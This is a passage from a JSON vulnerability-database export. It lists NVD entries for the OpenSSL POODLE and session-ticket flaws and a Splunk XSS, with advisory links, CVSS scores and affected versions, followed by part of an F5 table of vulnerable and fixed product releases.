"http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html", "http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html", "http://www.securitytracker.com/id/1031107", "https://support.apple.com/HT205217", "https://support.apple.com/kb/HT6536", "http://rhn.redhat.com/errata/RHSA-2014-1877.html", "http://www.vmware.com/security/advisories/VMSA-2015-0003.html", "https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/", "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html", "http://www.securityfocus.com/archive/1/archive/1/533724/100/0/threaded", "http://marc.info/?l=bugtraq&m=141813976718456&w=2", "http://marc.info/?l=bugtraq&m=142624679706236&w=2", "http://marc.info/?l=bugtraq&m=143290583027876&w=2", "http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html", "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6", "http://www.securitytracker.com/id/1031029", "http://www.debian.org/security/2014/dsa-3053", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00033.html", "http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10705", "http://marc.info/?l=bugtraq&m=142962817202793&w=2", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04819635", "http://rhn.redhat.com/errata/RHSA-2015-0079.html", "http://www.securitytracker.com/id/1031093", "https://github.com/mpgn/poodle-PoC", "http://marc.info/?l=bugtraq&m=142624619906067", "http://rhn.redhat.com/errata/RHSA-2014-1881.html", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00024.html", "http://marc.info/?l=bugtraq&m=141477196830952&w=2", "http://www.debian.org/security/2016/dsa-3489", "http://marc.info/?l=openssl-dev&m=141333049205629&w=2", "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00018.html", "https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html", "http://www.securitytracker.com/id/1031123", "https://bugzilla.mozilla.org/show_bug.cgi?id=1076983", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05157667", "http://marc.info/?l=bugtraq&m=144101915224472&w=2", "http://www.securitytracker.com/id/1031124", "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169374.html", "http://marc.info/?l=bugtraq&m=141620103726640&w=2", "http://www.securitytracker.com/id/1031095", "https://www.openssl.org/news/secadv_20141015.txt", "https://security.netapp.com/advisory/ntap-20141015-0001/", "http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-3566.html", "http://rhn.redhat.com/errata/RHSA-2015-0698.html", "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html", "http://www.ubuntu.com/usn/USN-2487-1", "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021431", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00036.html", "http://marc.info/?l=bugtraq&m=141450973807288&w=2", "http://marc.info/?l=bugtraq&m=142791032306609&w=2", "http://lists.apple.com/archives/security-announce/2015/Jan/msg00003.html", "http://marc.info/?l=bugtraq&m=143039249603103&w=2", "http://marc.info/?l=bugtraq&m=142103967620673&w=2", "http://marc.info/?l=bugtraq&m=143290437727362&w=2", "http://www.debian.org/security/2015/dsa-3253", "http://lists.apple.com/archives/security-announce/2015/Sep/msg00002.html", "http://marc.info/?l=bugtraq&m=142546741516006&w=2", "http://marc.info/?l=bugtraq&m=142350196615714&w=2", "http://marc.info/?l=bugtraq&m=143290522027658&w=2", "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html", "http://www.securityfocus.com/archive/1/533747", "https://support.apple.com/kb/HT6529", "http://advisories.mageia.org/MGASA-2014-0416.html", "http://marc.info/?l=bugtraq&m=141697676231104&w=2", "https://security.gentoo.org/glsa/201606-11", "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html", "http://rhn.redhat.com/errata/RHSA-2014-1876.html", "http://www.us-cert.gov/ncas/alerts/TA14-290A", "http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04779034", "http://lists.fedoraproject.org/pipermail/package-announce/2014-November/142330.html", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00021.html", "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00027.html", "http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html", "http://marc.info/?l=bugtraq&m=141697638231025&w=2", "https://www.elastic.co/blog/logstash-1-4-3-released", "http://support.apple.com/HT204244", "http://www.securitytracker.com/id/1031086", "http://marc.info/?l=bugtraq&m=141577350823734&w=2", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05301946", "https://security.gentoo.org/glsa/201507-14", "http://marc.info/?l=bugtraq&m=142660345230545&w=2", "http://www.securitytracker.com/id/1031096", "http://marc.info/?l=bugtraq&m=142624719706349&w=2", "https://kc.mcafee.com/corporate/index?page=content&id=SB10090", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html", "https://support.lenovo.com/product_security/poodle", "http://rhn.redhat.com/errata/RHSA-2015-0085.html", "http://www.kb.cert.org/vuls/id/577193", "http://marc.info/?l=bugtraq&m=141814011518700&w=2", "http://www.mandriva.com/security/advisories?name=MDVSA-2014:203", "http://www-01.ibm.com/support/docview.wss?uid=swg21692299", "http://www.securitytracker.com/id/1031131", "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0", "http://marc.info/?l=bugtraq&m=143628269912142&w=2", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00026.html", "http://marc.info/?l=bugtraq&m=141450452204552&w=2", "http://www-01.ibm.com/support/docview.wss?uid=swg21686997", "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html", "https://support.apple.com/kb/HT6535", "http://rhn.redhat.com/errata/RHSA-2015-0086.html", "http://marc.info/?l=bugtraq&m=143290371927178&w=2", "http://marc.info/?l=bugtraq&m=141879378918327&w=2", "http://rhn.redhat.com/errata/RHSA-2014-1882.html", "http://marc.info/?l=bugtraq&m=142607790919348&w=2", "http://marc.info/?l=bugtraq&m=142721830231196&w=2", "http://marc.info/?l=bugtraq&m=142496355704097&w=2", "https://support.apple.com/kb/HT6527", "http://rhn.redhat.com/errata/RHSA-2015-0068.html", "http://marc.info/?l=bugtraq&m=142357976805598&w=2", "http://marc.info/?l=bugtraq&m=141577087123040&w=2", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00001.html", "http://rhn.redhat.com/errata/RHSA-2014-1948.html", "http://marc.info/?l=bugtraq&m=142118135300698&w=2", "http://www.securityfocus.com/archive/1/533746", "http://www.securitytracker.com/id/1031094", "http://www.securitytracker.com/id/1031039", "https://support.apple.com/kb/HT6542", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05068681", "http://www.securitytracker.com/id/1031090", "http://marc.info/?l=bugtraq&m=143558137709884&w=2", "https://puppet.com/security/cve/poodle-sslv3-vulnerability", "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00066.html", "http://marc.info/?l=bugtraq&m=142805027510172&w=2", "http://marc.info/?l=bugtraq&m=144294141001552&w=2", "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04583581", "http://www.securitytracker.com/id/1031089", "http://rhn.redhat.com/errata/RHSA-2015-1545.html", "http://www.debian.org/security/2015/dsa-3144", "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141114.html", "http://marc.info/?l=bugtraq&m=143558192010071&w=2", "http://marc.info/?l=bugtraq&m=141694355519663&w=2", "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169361.html", "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00002.html", "http://www.securitytracker.com/id/1031092", "http://www.securityfocus.com/bid/70574", "https://access.redhat.com/articles/1232123", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://rhn.redhat.com/errata/RHSA-2014-1692.html", "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-405500.htm", "http://www.securitytracker.com/id/1031130", "http://marc.info/?l=bugtraq&m=141703183219781&w=2", "http://www.securitytracker.com/id/1031088", "http://www.debian.org/security/2015/dsa-3147", "http://marc.info/?l=bugtraq&m=144251162130364&w=2", "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html", "http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-released.aspx", "http://www.securitytracker.com/id/1031106", "http://marc.info/?l=bugtraq&m=142740155824959&w=2", "http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vulnerability-cve-2014-3566", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc", "https://bto.bluecoat.com/security-advisory/sa83", "http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/", "https://groups.google.com/forum/#!topic/docker-user/oYm0i3xShJU", "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141158.html", "http://rhn.redhat.com/errata/RHSA-2014-1920.html", "http://docs.ipswitch.com/MOVEit/DMZ82/ReleaseNotes/MOVEitReleaseNotes82.pdf", "http://marc.info/?l=bugtraq&m=142495837901899&w=2", "https://support.lenovo.com/us/en/product_security/poodle", "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021439", "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html", "http://www.securitytracker.com/id/1031087", "https://technet.microsoft.com/library/security/3009008.aspx", "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc", "http://www.ubuntu.com/usn/USN-2486-1", "http://rhn.redhat.com/errata/RHSA-2015-0264.html", "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html", "http://marc.info/?l=bugtraq&m=141576815022399&w=2", "http://marc.info/?l=bugtraq&m=145983526810210&w=2", "http://rhn.redhat.com/errata/RHSA-2014-1880.html", "http://marc.info/?l=bugtraq&m=141628688425177&w=2", "http://marc.info/?l=bugtraq&m=142624619906067&w=2", "http://marc.info/?l=bugtraq&m=142624590206005&w=2", "http://marc.info/?l=bugtraq&m=142350298616097&w=2", "http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html", "http://www.securitytracker.com/id/1031120", "http://marc.info/?l=bugtraq&m=143101048219218&w=2", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1152789", "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00000.html", "http://rhn.redhat.com/errata/RHSA-2015-0080.html", "http://rhn.redhat.com/errata/RHSA-2014-1653.html", "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html", "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://marc.info/?l=bugtraq&m=142296755107581&w=2", "http://www.securitytracker.com/id/1031091", "http://rhn.redhat.com/errata/RHSA-2014-1652.html", "http://marc.info/?l=bugtraq&m=142804214608580&w=2", "https://support.apple.com/kb/HT6541", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "http://www.securitytracker.com/id/1031085", "https://www.suse.com/support/kb/doc.php?id=7015773", "https://kc.mcafee.com/corporate/index?page=content&id=SB10091", "http://marc.info/?l=bugtraq&m=141775427104070&w=2", "https://kc.mcafee.com/corporate/index?page=content&id=SB10104", "https://support.apple.com/kb/HT6531", "http://www-01.ibm.com/support/docview.wss?uid=swg21688283"], "description": "The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue.", "edition": 10, "reporter": "NVD", "published": "2014-10-14T20:55:02", "title": "CVE-2014-3566", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-3566"], "scanner": [], "modified": "2018-08-13T17:47:48", "cpe": ["cpe:/a:oracle:database:11.2.0.4", "cpe:/o:netbsd:netbsd:5.1", "cpe:/a:openssl:openssl:1.0.0k", "cpe:/a:openssl:openssl:0.9.8y", "cpe:/a:openssl:openssl:0.9.8m", "cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:0.9.8n", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:7.0", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:openssl:openssl:0.9.8za", "cpe:/o:novell:opensuse:12.3", "cpe:/a:openssl:openssl:0.9.8zb", "cpe:/a:openssl:openssl:0.9.8u", "cpe:/o:netbsd:netbsd:6.0.2", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:0.9.8w", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/o:netbsd:netbsd:6.1", "cpe:/a:openssl:openssl:1.0.1:beta2", "cpe:/o:ibm:vios:2.2.3.0", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:novell:suse_linux_enterprise_desktop:10.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:0.9.8j", "cpe:/a:openssl:openssl:0.9.8t", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.0:beta3", "cpe:/a:openssl:openssl:1.0.0:beta1", "cpe:/o:ibm:vios:2.2.2.4", "cpe:/o:novell:suse_linux_enterprise_server:11.0:sp3", "cpe:/o:ibm:aix:6.1", "cpe:/o:novell:suse_linux_enterprise_desktop:9.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:ibm:vios:2.2.0.11", "cpe:/o:ibm:vios:2.2.0.12", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/o:ibm:vios:2.2.1.7", "cpe:/o:fedoraproject:fedora:19", "cpe:/a:openssl:openssl:0.9.8q", "cpe:/o:novell:suse_linux_enterprise_desktop:11.0", "cpe:/a:openssl:openssl:1.0.0a", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:netbsd:netbsd:6.0.6", "cpe:/o:ibm:vios:2.2.2.0", "cpe:/a:openssl:openssl:1.0.1g", "cpe:/o:ibm:vios:2.2.1.3", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:netbsd:netbsd:6.1.1", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:76.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0:sp3:~~~vmware~~", "cpe:/o:fedoraproject:fedora:21", "cpe:/o:ibm:vios:2.2.1.9", "cpe:/a:openssl:openssl:0.9.8z", "cpe:/o:ibm:vios:2.2.1.0", "cpe:/a:openssl:openssl:0.9.8o", "cpe:/a:openssl:openssl:1.0.0h", "cpe:/o:ibm:vios:2.2.1.5", "cpe:/a:openssl:openssl:0.9.8x", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:netbsd:netbsd:5.1.1", "cpe:/o:ibm:vios:2.2.2.3", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:11.0:sp3", "cpe:/o:netbsd:netbsd:5.2.2", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/o:netbsd:netbsd:6.0", "cpe:/o:ibm:vios:2.2.2.5", "cpe:/a:openssl:openssl:1.0.1h", "cpe:/a:openssl:openssl:0.9.8s", "cpe:/o:ibm:aix:7.1", "cpe:/o:netbsd:netbsd:6.1.2", "cpe:/a:openssl:openssl:1.0.0l", "cpe:/a:oracle:database:12.1.0.2", "cpe:/o:netbsd:netbsd:6.0.4", "cpe:/o:ibm:vios:2.2.0.10", "cpe:/o:netbsd:netbsd:6.1.5", "cpe:/o:netbsd:netbsd:5.2", "cpe:/a:openssl:openssl:1.0.0:beta4", "cpe:/o:netbsd:netbsd:6.0.3", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl:openssl:0.9.8", "cpe:/a:openssl:openssl:1.0.0", "cpe:/a:openssl:openssl:1.0.0i", "cpe:/a:openssl:openssl:0.9.8i", "cpe:/a:openssl:openssl:1.0.0f", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:openssl:openssl:0.9.8m:beta1", "cpe:/o:ibm:vios:2.2.2.1", "cpe:/o:ibm:vios:2.2.1.6", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/o:ibm:vios:2.2.3.3", "cpe:/a:openssl:openssl:1.0.1:beta3", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.0e", "cpe:/o:fedoraproject:fedora:20", "cpe:/a:openssl:openssl:1.0.0g", "cpe:/a:openssl:openssl:0.9.8r", "cpe:/o:ibm:vios:2.2.3.2", "cpe:/o:netbsd:netbsd:6.0:beta", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/o:ibm:vios:2.2.1.8", "cpe:/a:openssl:openssl:1.0.1i", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:ibm:vios:2.2.3.4", "cpe:/a:openssl:openssl:1.0.0j", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:mageia:mageia:4.0", "cpe:/o:netbsd:netbsd:5.2.1", "cpe:/o:netbsd:netbsd:6.1.3", "cpe:/a:openssl:openssl:1.0.1:beta1", "cpe:/o:netbsd:netbsd:5.1.4", "cpe:/a:openssl:openssl:1.0.0b", "cpe:/o:ibm:vios:2.2.1.1", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/o:redhat:enterprise_linux_server_supplementary:7.0", "cpe:/o:netbsd:netbsd:6.0.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:netbsd:netbsd:5.1.2", "cpe:/a:openssl:openssl:0.9.8v", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:openssl:openssl:1.0.0d", "cpe:/o:netbsd:netbsd:6.1.4", "cpe:/a:openssl:openssl:1.0.1f", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/a:openssl:openssl:1.0.0m", "cpe:/o:ibm:vios:2.2.1.4", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:ibm:aix:5.3", "cpe:/o:ibm:vios:2.2.0.13", "cpe:/o:ibm:vios:2.2.2.2", "cpe:/o:mageia:mageia:3.0", "cpe:/a:openssl:openssl:1.0.0:beta2", "cpe:/a:openssl:openssl:1.0.0n", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:openssl:openssl:1.0.0:beta5", "cpe:/o:ibm:vios:2.2.3.1", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl:openssl:1.0.0c", "cpe:/o:netbsd:netbsd:6.0.1", "cpe:/o:apple:mac_os_x:10.10.1", "cpe:/a:openssl:openssl:0.9.8l", "cpe:/o:novell:opensuse:13.1", "cpe:/o:netbsd:netbsd:5.1.3", "cpe:/a:openssl:openssl:0.9.8p"], "id": "CVE-2014-3566", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-15T11:55:25", "references": ["http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html", "https://support.citrix.com/article/CTX216642", "http://www.securitytracker.com/id/1031052", "https://support.apple.com/HT205217", "http://marc.info/?l=bugtraq&m=143290583027876&w=2", "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6", "http://www.debian.org/security/2014/dsa-3053", "http://marc.info/?l=bugtraq&m=141477196830952&w=2", "https://www.openssl.org/news/secadv_20141015.txt", "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=7fd4ce6a997be5f5c9e744ac527725c2850de203", "http://marc.info/?l=bugtraq&m=142791032306609&w=2", "http://lists.apple.com/archives/security-announce/2015/Jan/msg00003.html", "http://security.gentoo.org/glsa/glsa-201412-39.xml", "http://marc.info/?l=bugtraq&m=142103967620673&w=2", "http://marc.info/?l=bugtraq&m=143290437727362&w=2", "http://lists.apple.com/archives/security-announce/2015/Sep/msg00002.html", "http://marc.info/?l=bugtraq&m=143290522027658&w=2", "http://advisories.mageia.org/MGASA-2014-0416.html", "http://marc.info/?l=bugtraq&m=142834685803386&w=2", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05150888", "http://support.apple.com/HT204244", "http://www.ubuntu.com/usn/USN-2385-1", "http://rhn.redhat.com/errata/RHSA-2015-0126.html", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2014:203", "http://www-01.ibm.com/support/docview.wss?uid=swg21686997", "http://marc.info/?l=bugtraq&m=142118135300698&w=2", "http://rhn.redhat.com/errata/RHSA-2014-1692.html", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc", "http://marc.info/?l=bugtraq&m=142495837901899&w=2", "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc", "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html", "http://www.securityfocus.com/bid/70586", "http://www.splunk.com/view/SP-CAAANST", "http://marc.info/?l=bugtraq&m=142624590206005&w=2", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html", "http://rhn.redhat.com/errata/RHSA-2014-1652.html", "http://marc.info/?l=bugtraq&m=142804214608580&w=2", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05158380", "https://kc.mcafee.com/corporate/index?page=content&id=SB10091"], "edition": 3, "description": "Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure.", "reporter": "NVD", "published": "2014-10-18T21:55:13", "title": "CVE-2014-3567", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-3567"], "scanner": [], "cpe": ["cpe:/a:openssl:openssl:1.0.0k", "cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:0.9.8zb", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:1.0.1:beta2", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.0:beta3", "cpe:/a:openssl:openssl:1.0.0:beta1", "cpe:/a:openssl:openssl:1.0.0a", "cpe:/a:openssl:openssl:1.0.1g", "cpe:/a:openssl:openssl:1.0.0h", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:1.0.1h", "cpe:/a:openssl:openssl:1.0.0l", "cpe:/a:openssl:openssl:1.0.0:beta4", "cpe:/a:openssl:openssl:1.0.0", "cpe:/a:openssl:openssl:1.0.0i", "cpe:/a:openssl:openssl:1.0.0f", "cpe:/a:openssl:openssl:1.0.1:beta3", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.0e", "cpe:/a:openssl:openssl:1.0.0g", "cpe:/a:openssl:openssl:1.0.1i", "cpe:/a:openssl:openssl:1.0.0j", "cpe:/a:openssl:openssl:1.0.1:beta1", "cpe:/a:openssl:openssl:1.0.0b", "cpe:/a:openssl:openssl:1.0.0d", "cpe:/a:openssl:openssl:1.0.1f", "cpe:/a:openssl:openssl:1.0.0m", "cpe:/a:openssl:openssl:1.0.0:beta2", "cpe:/a:openssl:openssl:1.0.0n", "cpe:/a:openssl:openssl:1.0.0:beta5", "cpe:/a:openssl:openssl:1.0.0c"], "modified": "2017-11-14T21:29:04", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3567", "id": "CVE-2014-3567", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T20:50:58", "references": ["http://www.splunk.com/view/SP-CAAANST"], "edition": 1, "description": "Cross-site scripting (XSS) vulnerability in the Dashboard in Splunk Web in Splunk Enterprise 6.1.x before 6.1.4, 6.0.x before 6.0.7, and 5.0.x before 5.0.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "reporter": "NVD", "published": "2014-12-16T13:59:05", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2014-5466", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-5466"], "scanner": [], "modified": "2014-12-17T14:31:00", "cpe": ["cpe:/a:splunk:splunk:5.0.8", "cpe:/a:splunk:splunk:6.0.6", "cpe:/a:splunk:splunk:5.0", "cpe:/a:splunk:splunk:6.1.3", "cpe:/a:splunk:splunk:6.0.3", "cpe:/a:splunk:splunk:6.0.2", "cpe:/a:splunk:splunk:5.0.9", "cpe:/a:splunk:splunk:6.0", "cpe:/a:splunk:splunk:6.0.5", "cpe:/a:splunk:splunk:5.0.5", "cpe:/a:splunk:splunk:6.0.4", "cpe:/a:splunk:splunk:5.0.4", "cpe:/a:splunk:splunk:6.1.2", "cpe:/a:splunk:splunk:5.0.1", "cpe:/a:splunk:splunk:5.0.3", "cpe:/a:splunk:splunk:6.1", "cpe:/a:splunk:splunk:6.0.1", "cpe:/a:splunk:splunk:5.0.2", "cpe:/a:splunk:splunk:5.0.6", "cpe:/a:splunk:splunk:6.1.4", "cpe:/a:splunk:splunk:5.0.7", "cpe:/a:splunk:splunk:6.1.1"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5466", "id": "CVE-2014-5466", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "f5": [{"lastseen": "2017-09-18T23:48:31", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned ID 481907, ID 484678, ID 484677 (BIG-IP, BIG-IQ, Enterprise Manager), ID 484393 (ARX), ID 484708 (FirePass), and LRS-31601 (LineRate) to this vulnerability, and is currently evaluating the vulnerability status for supported releases. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H484499 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\n**Important**: Some releases in the following table have multiple component entries with different vulnerable and non-vulnerable version information.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP AAM | 11.4.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.4.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP AFM | 11.3.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.3.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP Analytics | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP APM | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP ASM | 11.0.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP DNS | None | 12.0.0 | None \n \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | None | SSL profiles \nConfiguration utility \n \nBIG-IP GTM | 11.0.0 - 11.6.1 | None | Configuration utility \n \nBIG-IP Link Controller | 11.0.0 - 11.6.1 | 12.0.0 | Configuration utility \n | | | \nBIG-IP PEM | 11.3.0 - 11.4.1 | 12.0.0* \n11.5.0 - 11.6.1* | SSL profiles \n11.3.0 - 11.6.1 | 12.0.0 | Configuration utility \n \nBIG-IP PSM | 11.0.0 - 11.4.1 | None | SSL profiles \nConfiguration utility \n \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | None | SSL profiles \nConfiguration utility \n \nBIG-IP WOM | 11.0.0 - 11.3.0 | None | SSL profiles \nConfiguration utility \n \nARX | 6.0.0 - 6.4.0 | None | ARX Manager GUI \nAPI (disabled by default) \n \nEnterprise Manager | 3.0.0 - 3.1.1 \n2.0.0 - 2.3.0 | None | Configuration utility \n \nFirePass | 7.0.0 \n6.0.0 - 6.1.0 | None | Administrative interface \nWebServices \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Configuration utility \n4.0.0 - 4.5.0 | None | REST API \n \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Configuration utility \n4.2.0 